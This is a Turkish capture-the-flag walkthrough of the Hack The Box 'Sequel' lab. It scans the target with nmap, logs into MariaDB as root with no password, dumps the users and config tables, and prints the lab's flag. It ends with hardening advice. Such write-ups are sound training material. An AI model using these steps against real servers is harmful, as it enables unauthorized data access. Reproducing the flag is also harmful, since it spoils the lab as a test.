Adım 0: Başlangıç#

1
mkdir -p HTB/LAB/SEQUEL && cd HTB/LAB/SEQUEL
2
IP=10.129.x.x && ping -c 2 $IP

Bu komutları anlamıyorsan, ilk raporlara göz at.

• GİT! Başlangıç bölümünü incele -> Meow
• GİT! Başlangıç bölümünü incele -> Fawn

Adım 1: Keşif#

1
nmap -sC -sV $IP

Adım 2: Veritabanına Bağlan#

root olarak şifresiz (boş şifre) bağlanmayı dene. Bu klasik bir yanlış yapılandırma: uzaktan root girişi kimlik doğrulaması olmadan izin veriliyor.

1
mariadb -u root -h $IP --skip-ssl

Yerel MariaDB istemcimiz varsayılan olarak şifreli bir bağlantı (SSL) kurmaya çalıştı, ancak hedef sunucu bunu desteklemediği için bir ERROR 2026 hatası aldık. Bu güvenlik kontrolünü atlatmak ve bağlantıyı kurmak için --skip-ssl parametresini kullandık.

mysql> prompt almalısın. Bağlantı reddedilirse VPN, IP ve makinenin tamamen başlatıldığını kontrol et.

Adım 3: Keşfet ve Flag’i Al#

MySQL kabuğunun içinde:

1
SHOW DATABASES;

information_schema, mysql, performance_schema yanında bir de htb veritabanı görmelisin.

1
USE htb;
2
SHOW TABLES;
3
SELECT * FROM users;

Admin kullanıcı olarak giriş yaptık. Ancak burada sadece kullanıcıların e-postalarına erişebiliyoruz. Flag yok.

config tablosunu görmelisin (key–value tarzı veri). Şimdi hamlemizi yapalım.

1
SELECT * FROM config;

Flag sonuç kümesinde.

Flag ve bitir#

1
7b4bec00d1a39e3dd4e021ec3d915da8

Önemli

MariaDB/MySQL’i asla root kullanıcıyla ve şifresiz (ya da zayıf varsayılan şifrelerle) ağa maruz bırakmayın. Bağlanma adresini sınırlayın, 3306 numaralı bağlantı noktasını güvenlik duvarıyla koruyun, güçlü kimlik bilgileri kullanın ve gerekmiyorsa uzaktan root erişimini devre dışı bırakın. Alınması gereken ders buydu.

ve iyi geceler “sequel”..#